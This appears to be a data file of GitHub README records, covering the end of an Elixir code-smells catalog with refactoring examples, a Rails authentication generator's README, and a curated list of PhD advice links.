iex(1)> c("module_one.ex")
[MyLibrary.Foo]
iex(2)> c("module_two.ex")
[MyLibrary.Utils.Foo]
iex(3)> MyLibrary.Foo.from_module_one()
"Function from module one!"
iex(4)> MyLibrary.Utils.Foo.from_module_two()
"Function from module two!"
```
This example is based on the description provided in Elixir's official documentation. Source: [link][ModulesWithIdenticalNamesExample]
[▲ back to Index](#table-of-contents)
___
### Unnecessary macros
* __Category:__ Low-level concerns smells.
* __Problem:__ ``Macros`` are powerful meta-programming mechanisms that can be used in Elixir to extend the language. While implementing ``macros`` is not a code smell in itself, this meta-programming mechanism should only be used when absolutely necessary. Whenever a macro is implemented where the same problem could have been solved using functions or other pre-existing Elixir structures, the code becomes unnecessarily complex and less readable. Because ``macros`` are more difficult to implement and understand, their indiscriminate use can compromise the evolution of a system, reducing its maintainability.
* __Example:__ The code shown below is an example of this smell. The ``MyMath`` module implements the ``sum/2`` macro to perform the sum of two numbers received as parameters. While this code has no syntax errors and can be executed correctly to get the desired result, it is unnecessarily more complex. By implementing this functionality as a macro rather than a conventional function, the code became less clear and less objective:
```elixir
defmodule MyMath do
  defmacro sum(v1, v2) do
    quote do
      unquote(v1) + unquote(v2)
    end
  end
end
#...Use examples...
iex(1)> require MyMath
MyMath
iex(2)> MyMath.sum(3, 5)
8
iex(3)> MyMath.sum(3+1, 5+6)
15
```
* __Refactoring:__ To remove this code smell, the developer must replace the unnecessary macro with structures that are simpler to write and understand, such as named functions. The code shown below is the result of the refactoring of the previous example. Basically, the ``sum/2`` macro has been transformed into a conventional named function. Note that the ``require`` command is no longer needed:
```elixir
defmodule MyMath do
  def sum(v1, v2) do # <= macro became a named function!
    v1 + v2
  end
end
#...Use examples...
# No need to require anymore!
iex(1)> MyMath.sum(3, 5)
8
iex(2)> MyMath.sum(3+1, 5+6)
15
```
This example is based on the description provided in Elixir's official documentation. Source: [link][UnnecessaryMacroExample]
[▲ back to Index](#table-of-contents)
___
### Dynamic atom creation
* __Category:__ Low-level concerns smells.
* __Note:__ This smell emerged from a study with mining software repositories (MSR).
* __Problem:__ An ``atom`` is a basic data type of Elixir whose value is its own name. Atoms are often useful to identify resources or to express the state of an operation. The creation of an ``atom`` does not characterize a smell by itself; however, ``atoms`` are not collected by Elixir's garbage collector, so values of this type live in memory during an application's entire lifetime. In addition, BEAM limits the number of ``atoms`` that can exist in an application (``1_048_576``) and each ``atom`` has a maximum size of 255 Unicode code points. For these reasons, dynamic atom creation is considered a code smell, since the developer has no control over how many ``atoms`` will be created during the execution of the application. This unpredictable scenario can expose an app to unexpected behavior caused by excessive memory usage, or even by reaching the maximum number of ``atoms`` possible.
* __Example:__ The code shown below is an example of this smell. Imagine that you are implementing code that converts ``string`` values into ``atoms`` to identify resources. These ``strings`` can come from user input or from responses to API requests. As this is a dynamic and unpredictable scenario, identical ``strings`` may be converted over and over, and arbitrary new ``strings`` may keep creating new ``atoms``, with no control over how many are created. This kind of conversion, in addition to wasting memory, can be problematic for an application if it happens too often.
```elixir
defmodule Identifier do
  ...

  def generate(id) when is_bitstring(id) do
    String.to_atom(id) # <= dynamic atom creation!!
  end
end
#...Use examples...
iex(1)> string_from_user_input = "my_id"
"my_id"
iex(2)> string_from_API_response = "my_id"
"my_id"
iex(3)> Identifier.generate(string_from_user_input)
:my_id
iex(4)> Identifier.generate(string_from_API_response)
:my_id #<= atom repeated was created!
```
When we use the ``String.to_atom/1`` function to dynamically create an ``atom``, it is created even if no atom with that value exists in memory yet, so when this happens automatically we have no control over staying within the limits established by BEAM.
* __Refactoring:__ To remove this smell, as shown below, first you must ensure that all the identifier ``atoms`` are created statically, only once, at the beginning of an application's execution:
```elixir
# statically created atoms...
_ = :my_id
_ = :my_id2
_ = :my_id3
_ = :my_id4
```
Next, you should replace the use of the ``String.to_atom/1`` function with ``String.to_existing_atom/1``. This makes string-to-atom conversions simply map the strings to atoms already in memory (statically created at the beginning of the execution), thus preventing new ``atoms`` from being created dynamically. This second part of the refactoring is presented below.
```elixir
defmodule Identifier do
  ...

  def generate(id) when is_bitstring(id) do
    String.to_existing_atom(id) # <= just maps a string to an existing atom!
  end
end
#...Use examples...
iex(1)> Identifier.generate("my_id")
:my_id
iex(2)> Identifier.generate("my_id2")
:my_id2
iex(3)> Identifier.generate("non_existent_id")
** (ArgumentError) errors were found at the given arguments:
* 1st argument: not an already existing atom
```
Note that in the third use example, when a ``string`` that does not correspond to an already existing ``atom`` is given, Elixir raises an error instead of performing the conversion. This demonstrates that this refactoring creates a more controlled and predictable scenario for the application in terms of memory usage.
This example and the refactoring are based on Elixir's official documentation. Sources: [1][to_atom], [2][to_existing_atom]
[▲ back to Index](#table-of-contents)
## About
This catalog was proposed by Lucas Vegi and Marco Tulio Valente, from [ASERG/DCC/UFMG][ASERG].
For more info see the following paper:
* [Code Smells in Elixir: Early Results from a Grey Literature Review][preprint-copy], International Conference on Program Comprehension (ICPC), 2022. [[slides]][ICPC22-PDF] [[video]][ICPC22-YouTube] [[podcast (pt-BR) - English subtitles available]][Podcast-Spotify]
* [Understanding code smells in Elixir functional language][emse-paper], Empirical Software Engineering Journal (EMSE), 2023.
Please feel free to make pull requests and suggestions ([Issues][Issues] tab).
[▲ back to Index](#table-of-contents)
## Acknowledgments
We are supported by __[Finbits][Finbits]__<sup>TM</sup>, a Brazilian Elixir-based fintech:
<div align="center">
<a href="https://www.finbits.com.br/" alt="Click to learn more about Finbits!" title="Click to learn more about Finbits!"><img width="20%" src="https://github.com/lucasvegi/Elixir-Code-Smells/blob/main/etc/finbits.png?raw=true"></a>
<br><br>
</div>
Our research is also part of the initiative called __[Research with Elixir][ResearchWithElixir]__ (in portuguese).
[▲ back to Index](#table-of-contents)
<!-- Links -->
[Elixir Smells]: https://github.com/lucasvegi/Elixir-Code-Smells
[Elixir]: http://elixir-lang.org
[ASERG]: http://aserg.labsoft.dcc.ufmg.br/
[MultiClauseExample]: https://syamilmj.com/2021-09-01-elixir-multi-clause-anti-pattern/
[ComplexErrorHandleExample]: https://elixirforum.com/t/what-are-sort-of-smells-do-you-tend-to-find-in-elixir-code/14971
[JoseValimExamples]: http://blog.plataformatec.com.br/2014/09/writing-assertive-code-with-elixir/
[dimitarvp]: https://elixirforum.com/u/dimitarvp
[MrDoops]: https://elixirforum.com/u/MrDoops
[neenjaw]: https://exercism.org/profiles/neenjaw
[angelikatyborska]: https://exercism.org/profiles/angelikatyborska
[ExceptionsForControlFlowExamples]: https://exercism.org/tracks/elixir/concepts/try-rescue
[DataManipulationByMigrationExamples]: https://www.idopterlabs.com.br/post/criando-uma-mix-task-em-elixir
[Migration]: https://hexdocs.pm/ecto_sql/Ecto.Migration.html
[MixTask]: https://hexdocs.pm/mix/Mix.html#module-mix-task
[CodeOrganizationByProcessExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-using-processes-for-code-organization
[GenServer]: https://hexdocs.pm/elixir/master/GenServer.html
[UnsupervisedProcessExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-spawning-unsupervised-processes
[Supervisor]: https://hexdocs.pm/elixir/master/Supervisor.html
[Discussions]: https://github.com/lucasvegi/Elixir-Code-Smells/discussions
[Issues]: https://github.com/lucasvegi/Elixir-Code-Smells/issues
[LargeMessageExample]: https://samuelmullen.com/articles/elixir-processes-send-and-receive
[Agent]: https://hexdocs.pm/elixir/1.13/Agent.html
[Task]: https://hexdocs.pm/elixir/1.13/Task.html
[GenServer]: https://hexdocs.pm/elixir/1.13/GenServer.html
[AgentObsessionExample]: https://elixir-lang.org/getting-started/mix-otp/agent.html#agents
[ElixirInProduction]: https://elixir-companies.com/
[WorkingWithInvalidDataExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-working-with-invalid-data
[ModulesWithIdenticalNamesExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-defining-modules-that-are-not-in-your-namespace
[UnnecessaryMacroExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-macros
[ApplicationEnvironment]: https://hexdocs.pm/elixir/1.13/Config.html
[AppConfigurationForCodeLibsExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-application-configuration
[CredoWarningApplicationConfigInModuleAttribute]: https://hexdocs.pm/credo/Credo.Check.Warning.ApplicationConfigInModuleAttribute.html
[Credo]: https://hexdocs.pm/credo/overview.html
[DependencyWithUseExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-use-when-an-import-is-enough
[ICPC-ERA]: https://conf.researchr.org/track/icpc-2022/icpc-2022-era
[preprint-copy]: https://doi.org/10.48550/arXiv.2203.08877
[emse-paper]: https://link.springer.com/epdf/10.1007/s10664-023-10343-6?sharing_token=-a5aIHuxjO5IVwjuWKcGDve4RwlQNchNByi7wbcMAY7M-LcfCdzMaX7W988J1lKodpMwih75AE3ZQ9gFhldJBeLq53jeNkeHR7W04UAwrxBvoXDh5P83TYkQfuz-PrYpU1J5KqxUgojIbDDFDV_jVtrEE8oVtobDqNSSrInauuI%3D
[jose-valim]: https://github.com/josevalim
[syamilmj]: https://github.com/syamilmj
[Complex-extraction-in-clauses-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/9
[Alternative-return-type-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/6
[Complex-else-clauses-in-with-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/7
[Large-code-generation-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/13
[ICPC22-PDF]: https://github.com/lucasvegi/Elixir-Code-Smells/blob/main/etc/Code-Smells-in-Elixir-ICPC22-Lucas-Vegi.pdf
[ICPC22-YouTube]: https://youtu.be/3X2gxg13tXo
[Podcast-Spotify]: http://elixiremfoco.com/episode?id=lucas-vegi-e-marco-tulio
[to_atom]: https://hexdocs.pm/elixir/String.html#to_atom/1
[to_existing_atom]: https://hexdocs.pm/elixir/String.html#to_existing_atom/1
[Finbits]: https://www.finbits.com.br/
[ResearchWithElixir]: http://pesquisecomelixir.com.br/
[TraditionalSmells]: https://github.com/lucasvegi/Elixir-Code-Smells/tree/main/traditional
| Catalog of Elixir-specific code smells | elixir-lang,code-smells,software-quality,elixir,elixir-examples | 0 | 11 | 14 | 158 | 2 | 1 | 0 |
lazaronixon/authentication-zero | # Authentication Zero
The purpose of authentication zero is to generate a pre-built authentication system into a rails application (web or api-only) that follows both security and rails best practices. By generating code into the user's application instead of using a library, the user has complete freedom to modify the authentication system so it works best with their app.
## Installation
```
$ bundle add authentication-zero
```
If you are using Rails < 7.1, you must use version 2.
```
$ bundle add authentication-zero --version "~> 2"
```
## Usage
```
$ rails generate authentication
```
## Developer responsibilities
Since Authentication Zero generates this code into your application instead of building these modules into the gem itself, you now have complete freedom to modify the authentication system, so it works best with your use case. The one caveat with using a generated authentication system is it will not be updated after it's been generated. Therefore, as improvements are made to the output of `rails generate authentication`, it becomes your responsibility to determine if these changes need to be ported into your application. Security-related and other important improvements will be explicitly and clearly marked in the `CHANGELOG.md` file and upgrade notes.
## Features
### Essential
- Sign up
- Email and password validations
- Checks if a password has been found in any data breach (--pwned)
- Authentication by cookie
- Authentication by token (--api)
- Two factor authentication + recovery codes (--two-factor)
- Two factor authentication using a hardware security key (--webauthn)
- Verify email using a link with token
- Ask password before sensitive data changes, aka: sudo (--sudoable)
- Reset the user password and send reset instructions
- Reset the user password only from verified emails
- Lock mechanism to prevent email bombing (--lockable)
- Rate limiting for your app, 1000 reqs/minute (--ratelimit)
- Send e-mail confirmation when your email has been changed
- Manage multiple sessions & devices
- Activity log (--trackable)
- Log out
### More
- Social login with OmniAuth (--omniauthable)
- Passwordless authentication (--passwordless)
- Send invitations (--invitable)
- "Sign-in as" button (--masqueradable)
- Multi-tenant application (--tenantable)
## Generated code
- [has_secure_password](https://api.rubyonrails.org/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password): Adds methods to set and authenticate against a bcrypt password.
- [authenticate_by](https://edgeapi.rubyonrails.org/classes/ActiveRecord/SecurePassword/ClassMethods.html#method-i-authenticate_by): Given a set of attributes, finds a record using the non-password attributes, and then authenticates that record using the password attributes.
- [generates_token_for](https://edgeapi.rubyonrails.org/classes/ActiveRecord/TokenFor/ClassMethods.html#method-i-generates_token_for): Defines the behavior of tokens generated for a specific purpose.
- [signed cookies](https://api.rubyonrails.org/classes/ActionDispatch/Cookies.html): Returns a jar that'll automatically generate a signed representation of cookie value and verify it when reading from the cookie again.
- [httponly cookies](https://api.rubyonrails.org/classes/ActionDispatch/Cookies.html): A cookie with the httponly attribute is inaccessible to the JavaScript, this precaution helps mitigate cross-site scripting (XSS) attacks.
- [signed_id](https://api.rubyonrails.org/classes/ActiveRecord/SignedId.html): Returns a signed id that is tamper proof, so it's safe to send in an email or otherwise share with the outside world.
- [current attributes](https://api.rubyonrails.org/classes/ActiveSupport/CurrentAttributes.html): Abstract super class that provides a thread-isolated attributes singleton, which resets automatically before and after each request.
- [action mailer](https://api.rubyonrails.org/classes/ActionMailer/Base.html): Action Mailer allows you to send email from your application using a mailer model and views.
- [log filtering](https://guides.rubyonrails.org/action_controller_overview.html#log-filtering): Parameters 'token' and 'password' are marked [FILTERED] in the log.
- [functional tests](https://guides.rubyonrails.org/testing.html#functional-tests-for-your-controllers): In Rails, testing the various actions of a controller is a form of writing functional tests.
- [system testing](https://guides.rubyonrails.org/testing.html#system-testing): System tests allow you to test user interactions with your application, running tests in either a real or a headless browser.
### Sudoable
Use `before_action :require_sudo` in controllers with sensitive information, it will ask for your password on the first access or after 30 minutes.
### Tenantable
Some artifacts are generated in the application, making it possible to implement row-level multitenancy. `Current.account` is set from the current user's account.
You should follow some steps to make it work:
- Add `account_id` to each scoped table. ex: `rails g migration add_account_to_projects account:references`.
- Add `include AccountScoped` to scoped models. It sets up the account relationship and a default scope using the current account.
Set `Current.account` through the URL. `http://myapp.com/:account_id`. (optional)
- Add `require_relative "../lib/account_middleware"` to `config/application.rb`.
- Add `config.middleware.use AccountMiddleware` to your application class.
- More customization is required...
## Development
To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
## Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/lazaronixon/authentication-zero. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [code of conduct](https://github.com/lazaronixon/authentication-zero/blob/main/CODE_OF_CONDUCT.md).
## License
The gem is available as open source under the terms of the [MIT License](https://opensource.org/licenses/MIT).
## Code of Conduct
Everyone interacting in the AuthenticationZero project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/lazaronixon/authentication-zero/blob/main/CODE_OF_CONDUCT.md).
| An authentication system generator for Rails applications. | rails,ruby,authentication,generator,rails-authentication,api,auth,security,token | 116 | 8 | 26 | 509 | 18 | 3 | 1 |
pliang279/awesome-phd-advice | # Collection of advice for prospective and current PhD students
By [Paul Liang](http://www.cs.cmu.edu/~pliang/) (pliang@cs.cmu.edu), [Machine Learning Department](http://www.ml.cmu.edu/) and [Language Technologies Institute](https://www.lti.cs.cmu.edu/), [CMU](https://www.cmu.edu/), with help from many friends at CMU. If there are any links I missed, please let me know! Credit goes out to the original authors of each link.
![](/phd030110s.gif)
## Table of Contents
* [Other similar collections](#other-similar-collections)
* [Advice for prospective students](#advice-for-prospective-students)
* [General advice](#general-advice)
* [Statement of purpose](#statement-of-purpose)
* [Visit days, choosing advisor and school](#visit-days-choosing-advisor-and-school)
* [Advice for current students](#advice-for-current-students)
* [PhD survival guides](#PhD-survival-guides)
* [Research](#research)
* [Reading](#reading)
* [Writing](#writing)
* [Blogposts](#blogposts)
* [Reviewing](#reviewing)
* [Presenting](#presenting)
* [Advising students](#advising-students)
* [Teaching](#teaching)
* [Fellowship applications](#fellowship-applications)
* [Networking](#networking)
* [Organizing workshops and tutorials](#organizing-workshops-and-tutorials)
* [Attending academic conferences](#attending-academic-conferences)
* [Job search](#job-search)
* [Memoirs](#memoirs)
## Other similar collections
[Grad School Advice by Jason Hong](http://www.cs.cmu.edu/~jasonh/advice.html)
[Advice for Research Students by Jason Eisner](https://www.cs.jhu.edu/~jason/advice/)
[Advice for researchers and students by Michael Ernst](https://homes.cs.washington.edu/~mernst/advice/)
[Advice Collection by Tao Xie and Yuan Xie](https://taoxie.cs.illinois.edu/advice.htm)
[Awesome CS PhD application advice by Jed Yang](https://jedyang.com/post/list-of-awesome-cs-phd-application-advice/)
[CS PhD the greatest hits by Angela Jiang](https://phdadvice.carrd.co/)
[List of PhD reflections by Stephen Tu](https://stephentu.github.io/blog/reflections/2016/02/28/list-phd-reflections.html)
[Thread of PhD application resources by Chaitanya Joshi](https://twitter.com/chaitjo/status/1444580607980281858?lang=en)
[Useful computer vision PhD resources by Yana Hasson](https://github.com/hassony2/useful-computer-vision-phd-resources)
[Checklists for Stat-ML PhD students by Aaditya Ramdas](https://www.stat.cmu.edu/~aramdas/checklists.html)
[Grad School Resources by Kalpesh Krishna](https://martiansideofthemoon.github.io/2018/05/29/grad-resources.html)
[AI Research Experiences by Pranav Rajpurkar](https://docs.google.com/document/d/1uvAbEhbgS_M-uDMTzmOWRlYxqCkogKRXdbKYYT98ooc/edit#)
## Advice for prospective students
### General advice
[Applying to PhD Programs in Computer Science by Mor Harchol-Balter](https://www.cs.cmu.edu/~harchol/gradschooltalk.pdf)
[Graduate School Advice by Stanford CS](https://cs.stanford.edu/degrees/phd/PhD/GraduateSchoolAdvice.pdf)
[Undergrad to PhD, or not - advice for undergrads interested in research by John Hewitt](https://nlp.stanford.edu//~johnhew//undergrad-researchers.html)
[HOWTO: Get into grad school for science, engineering, math and computer science by Matt Might](https://matt.might.net/articles/how-to-apply-and-get-in-to-graduate-school-in-science-mathematics-engineering-or-computer-science/)
[Applying for a PhD in NLP by Zhijing Jin and ACL Year-Round Mentorship Session](https://medium.com/@zhijing-jin/applying-for-a-phd-in-nlp-9d070a02cda0)
[Student Perspectives on Applying to NLP PhD Programs by Akari Asai, John Hewitt, Sidd Karamcheti, Kalpesh Krishna, Nelson Liu, Roma Patel, and Nicholas Tomlin](https://blog.nelsonliu.me/2019/10/24/student-perspectives-on-applying-to-nlp-phd-programs/)
[Machine Learning PhD Applications — Everything You Need to Know by Tim Dettmers](https://timdettmers.com/2018/11/26/phd-applications/)
[Demystifying ML PhD Admissions to US Universities by Hima Lakkaraju](https://www.youtube.com/watch?v=z6TkkdlRWcU&ab_channel=HimabinduLakkaraju)
[Demystifying PhD Admissions in Computer Science in the US: a Guide for Vietnamese and International Students by ThanhVu Nguyen](https://raw.githubusercontent.com/nguyenthanhvuh/phd-cs-us/main/demystify.pdf)
[A long, rambling, mostly personal corpus of advice on applying to Computer Science grad school (for UWCSE students) by Justine Sherry](https://people.eecs.berkeley.edu/~justine/advice.pdf)
[Ph.D. Applications: FAQ by Noah Smith](https://docs.google.com/document/d/1lT-bsIP0GKfh8l5sQnM2hCzzR9prt-QLx16rimUOdIM/edit)
[Quora answer on the admission committee process by Scott Fahlman](https://www.quora.com/What-does-the-admissions-committee-process-for-graduate-school-look-like-Do-you-sit-in-a-room-and-all-discuss-the-same-candidate-at-the-same-time-or-is-it-more-of-an-individual-process-with-opinions-aggregated-at-the-end)
[Reflecting on CS Graduate Admissions by David Anderson](https://da-data.blogspot.com/2015/03/reflecting-on-cs-graduate-admissions.html)
[A PhD is Not Enough: A Guide to Survival in Science by Peter Feibelman](https://biomath.usu.edu/files/Peter_J._Feibelman_A_PhD_Is_Not_Enough.pdf)
[The PhD in CS: Getting There and Being Successful by Michael Hilton, Janet Davis, and Ian Ludden](https://conquer.cra.org/wp-content/uploads/2021/11/ThePhDinComputing_CRAEWebinar.pdf)
### Statement of purpose
[Database of Example PhD SOPs by the CS-SOP initiative](https://cs-sop.org)
[Some Suggestions on writing your statement of purpose by Jennifer Mankoff](https://www.cc.gatech.edu/fce/people/jmankoff/gradschool/sops.html)
[Graduate School Personal Statements by Christopher Fletcher](http://cwfletcher.net/Pages/SoP.php)
[Inside PhD admissions: What readers look for in a Statement of Purpose by Nathan Schneider](https://nschneid.medium.com/inside-ph-d-admissions-what-readers-look-for-in-a-statement-of-purpose-3db4e6081f80)
[How to Write a Bad Statement by Andy Pavlo](https://www.cs.cmu.edu/~pavlo/blog/2015/10/how-to-write-a-bad-statement-for-a-computer-science-phd-admissions-application.html)
[Tips and Tricks, How-To Guide for Grad School SoPs by Erica Weng](https://t.co/J71ZD2dKJ1)
[Graduate School Statement of Purpose by MIT EECS](https://mitcommlab.mit.edu/eecs/commkit/graduate-school-personal-statement/)
[How to write personal statement for graduate school application by Stanley Chan](https://engineering.purdue.edu/ChanGroup/write_statement.html)
[Writing a Google AI Residency Cover Letter by Katherine Lee and Ben Eysenbach](https://colinraffel.com/blog/writing-a-google-ai-residency-cover-letter.html)
Public examples: [[Cody Coleman]](https://www.codycoleman.com/public/misc/Stanford-purpose.pdf), [[Sai Rallabandi]](http://www.cs.cmu.edu/~srallaba/pdfs/statement_PhD.pdf), [[Jeremy Lacomis]](https://www.cs.cmu.edu/~jlacomis/assets/statement/personal-statement-cmu.pdf), [[Sean Kross]](https://seankross.com/notes/grad-school-essays/ShortPersonalStatement.pdf), [[Zahid Hossain]](https://graphics.stanford.edu/~zhossain/grad/sop_mit.pdf), [[Jean Yang]](https://github.com/jeanqasaur/academic-application-materials/blob/master/phd-application-2007/personal_statement.pdf)
### Visit days, choosing advisor and school
[Questions to Ask a Prospective Ph.D. Advisor on Visit Day, With Thorough and Forthright Explanations by Andrew Kuznetsov](https://blog.ml.cmu.edu/2020/03/02/questions-to-ask-a-prospective-ph-d-advisor-on-visit-day-with-thorough-and-forthright-explanations/)
[How to Choose Your Grad School by Tim Dettmers](https://timdettmers.com/2022/03/13/how-to-choose-your-grad-school/)
[How to Pick a Graduate Advisor by Ben Barres](https://hst.mit.edu/sites/default/files/media/files/Barres%20BA.Neuron.80.275.2013.pdf)
[The Definitive ‘what do I ask/look for’ in a PhD Advisor Guide by Columbia CS](https://www.cs.columbia.edu/wp-content/uploads/2019/03/Get-Advisor.pdf)
## Advice for current students
### PhD survival guides
[So long, and thanks for the PhD by Ronald T. Azuma](https://www.cs.unc.edu/~azuma/hitch4.html)
[Graduate School: Keys To Success by Remzi Arpaci-Dusseau](https://www.youtube.com/watch?v=fqPSnjewkuA&ab_channel=RemziArpaci-Dusseau)
[The illustrated guide to a PhD by Matt Might](https://matt.might.net/articles/phd-school-in-pictures/)
[How to Be a Successful PhD Student by Mark Dredze, Hanna Wallach](https://people.cs.umass.edu/~wallach/how_to_be_a_successful_phd_student.pdf)
[Time Management by Randy Pausch](https://www.cs.utexas.edu/users/dahlin/bookshelf/timetalk.htm)
[Advice to a Beginning Graduate Student by Manuel Blum](https://www.cs.cmu.edu/~mblum/research/pdf/grad.html)
[Finances for CS PhD students by David Anderson](https://da-data.blogspot.com/2016/09/finances-for-cs-phd-students.html)
[A Survival Guide to a PhD by Andrej Karpathy](https://karpathy.github.io/2016/09/07/phd/)
[15 pieces of advice I wish my PhD advisor had given me by Jim Kurose](http://www-net.cs.umass.edu/kurose/talks/student_keynote_final.pdf)
[The Tao of PhD: Thriving in the Allen School’s Graduate Program by University of Washington](https://courses.cs.washington.edu/courses/cse590x/22wi/)
[10 tips for PhD students by Daniela Witten](https://imstat.org/2022/04/01/written-by-witten-so-long-and-thanks-for-all-the-tips/)
[Expectation Setting by Eugene Vinitsky](http://eugenevinitsky.github.io/posts/expectation_setting.html)
### Research
[How to Do Great Research by Nick Feamster and Alex Gray](https://greatresearch.org/)
[How to Have a Bad Career How to Have a Bad Career in Research/Academia by David Patterson](https://people.eecs.berkeley.edu/~pattrsn/talks/BadCareer.pdf)
[Useful Thoughts about Research by H.T. Kung](https://www.eecs.harvard.edu/htk/phdadvice/)
[You and Your Research by Richard Hamming](https://www.cs.virginia.edu/~robins/YouAndYourResearch.html)
[Advice on Research and Writing by Mark Leone](http://www.cs.cmu.edu/afs/cs.cmu.edu/user/mleone/web/how-to.html)
### Reading
[How to Read a Paper by Srinivasan Keshav](http://blizzard.cs.uwaterloo.ca/keshav/home/Papers/data/07/paper-reading.pdf)
[How to Read a Technical Paper by Jason Eisner](https://www.cs.jhu.edu/~jason/advice/how-to-read-a-paper.html)
### Writing
[How to write a good CVPR submission by Bill Freeman](https://billf.mit.edu/sites/default/files/documents/cvprPapers.pdf)
[Ten Simple Rules for Mathematical Writing by Dimitri Bertsekas](http://www.mit.edu/~dimitrib/Ten_Rules.html)
[Notes on writing by Fredo Durand](http://people.csail.mit.edu/fredo/PUBLI/writing.pdf)
[How to write a (hopefully good) paper by Martin Vetterli ](http://mri.beckman.illinois.edu/resources/good_paper.pdf)
### Blogposts
[PhDLife Blog](https://phdlife.warwick.ac.uk/) - A collection of blog posts from [Warwick University](https://warwick.ac.uk)
### Reviewing
[Reviewer Tutorial by CVPR 2022](https://cvpr2022.thecvf.com/sites/default/files/2021-11/How%20to%20be%20a%20good%20reviewer-tutorials%20for%20cvpr2022%20reviewers.pptx.pdf)
[How to write a good review by CVPR 2020](https://sites.google.com/view/making-reviews-great-again/)
[How to write a reviewer report by Stanley Chan](https://engineering.purdue.edu/ChanGroup/write_review.html)
### Presenting
[Giving an Academic Talk by Jonathan Shewchuk](https://people.eecs.berkeley.edu/~jrs/speaking.html)
[How to give a technical presentation by Michael Ernst](https://homes.cs.washington.edu/~mernst/advice/giving-talk.html)
### Advising students
(coming soon, send PR!)
### Teaching
[How to Be a Teaching Assistant by Jason Eisner](https://www.cs.jhu.edu/~jason/advice/how-to-ta.html)
### Fellowship applications
[Tips for the NSF GRFP Application by Danielle Perry](https://web.uri.edu/graduate-writing-center/tips-for-the-nsf-grfp-application/)
[NSF GRFP Advice by Christine Liu](http://www.christineliuart.com/writing/2018/8/31/advice-for-applying-to-the-nsf-grfp)
[NSF Fellowship by Alex Lang](https://www.alexhunterlang.com/nsf-fellowship)
[Tips by Tara Safavi](https://tsafavi.github.io/nsf-grfp.html)
Public examples: [[Extensive NSF collection by Alex Lang]](https://docs.google.com/spreadsheets/d/1xoezGhbtcpg3BvNdag2F5dTQM-Xl2EELUgAfG1eUg0s/edit#gid=0), [[Victoria Dean (NSF personal)]](https://vdean.github.io/resources/NSF_Personal_Statement_Victoria_Dean.pdf), [[Victoria Dean (NSF research)]](https://vdean.github.io/resources/NSF_Research_Statement_Victoria_Dean.pdf), [[Tara Safavi (NSF)]](https://tsafavi.github.io/assets/pdf/nsf-personal.pdf), [[Paul Liang (Facebook)]](http://www.cs.cmu.edu/~pliang/research_statement_paul_liang_2020.pdf), [[Devendra Chaplot (Facebook)]](https://devendrachaplot.github.io/misc/DevendraChaplot_Statement2019.pdf), [[Sai Rallabandi (Facebook)]](http://www.cs.cmu.edu/~srallaba/pdfs/fellowships_mothersheet.pdf)
### Networking
[Networking on the Network: A Guide to Professional Skills for PhD Students by Phil Agre](https://vlsicad.ucsd.edu/Research/Advice/network.html)
### Organizing workshops and tutorials
[Hitchhiker’s guide to organizing an academic workshop by Ben Eysenbach and Surya Bhupatiraju](https://medium.com/@erl.leads/hitchhikers-guide-to-organizing-an-academic-workshop-cc9a5b1c32c9)
### Attending academic conferences
[Nine things I wish I had known the first time I came to NeurIPS by Jennifer Vaughan](https://medium.com/@jennwv/nine-things-i-wish-i-had-known-the-first-time-i-came-to-nips-b939330661ed)
[NeurIPS 2018 through the eyes of first-timers by Fangyu Cai](https://medium.com/syncedreview/neurips-2018-through-the-eyes-of-first-timers-5156384900bd)
[How To Make A Plan To Attend International Academic Conferences](https://internationalconferencealerts.com/blog/how-to-make-a-plan-to-attend-international-academic-conferences/)
### Job search
[Tips for Computer Science Faculty Applications](https://yisongyue.medium.com/checklist-of-tips-for-computer-science-faculty-applications-9fd2480649cc)
[How to Ask for a Letter of Recommendation](https://kamathematics.wordpress.com/2021/08/18/how-to-ask-for-a-letter-of-recommendation/)
[Interview Questions for Computer Science Faculty Jobs](https://csfaculty.github.io/)
[The Ph.D. Job Hunt - Helping Students Find the Right Positions by Ed Lazowska](http://lazowska.cs.washington.edu/jobs.pdf)
[The N Things I wish I Knew Before the Job Search, by Maria Ebling, Guerney Hunt, Lily Mummert, Bill Tetzlaff, and John Davis](https://people.engr.tamu.edu/rabi/N%20Things.PDF)
[The academic job search for computer scientists in 10 questions by Nicolas Papernot and Elissa Redmiles](https://docs.google.com/document/u/1/d/e/2PACX-1vSeOnC_QdaJVc3OuuMfDHVlk3QotUxvghytRFaDsrdA0uovD5axQjp8kJCM4Evu1cCf9Hg_u_Stabu1/pub)
[Checklist for faculty job-hunting in Stat/ML by Aaditya Ramdas](https://www.stat.cmu.edu/~aramdas/checklists/aadi-jobhunt-checklist.pdf)
[Tips on the interview process by Jeannette Wing](https://www.cs.cmu.edu/~emigration/interview.pdf)
[Getting an academic job by Michael Ernst](https://homes.cs.washington.edu/~mernst/advice/academic-job.html)
[Computer science graduate job and interview guide by Wes Weimer, Claire Le Goues, Zak Fry, Kevin Leach, Yu Huang, and Kevin Angstadt](https://csguides.github.io/grad-job-guide/)
[Academic job search advice by Matt Might](http://matt.might.net/articles/advice-for-academic-job-hunt/)
## Memoirs
[I loved graduate school by Peter Bailis](http://www.bailis.org/blog/i-loved-graduate-school/)
[What my PhD was like by Jean Yang](https://jxyzabc.blogspot.com/2016/02/my-phd-abridged.html)
[How to get a Ph.D. in computer science if you're me by Chris Martens](http://lambdamaphone.blogspot.com/2015/11/how-to-get-phd-in-computer-science-if.html)
[The N=1 guide to grad school by Adam Marcus](http://marcua.net/writing/gradschool-guide/)
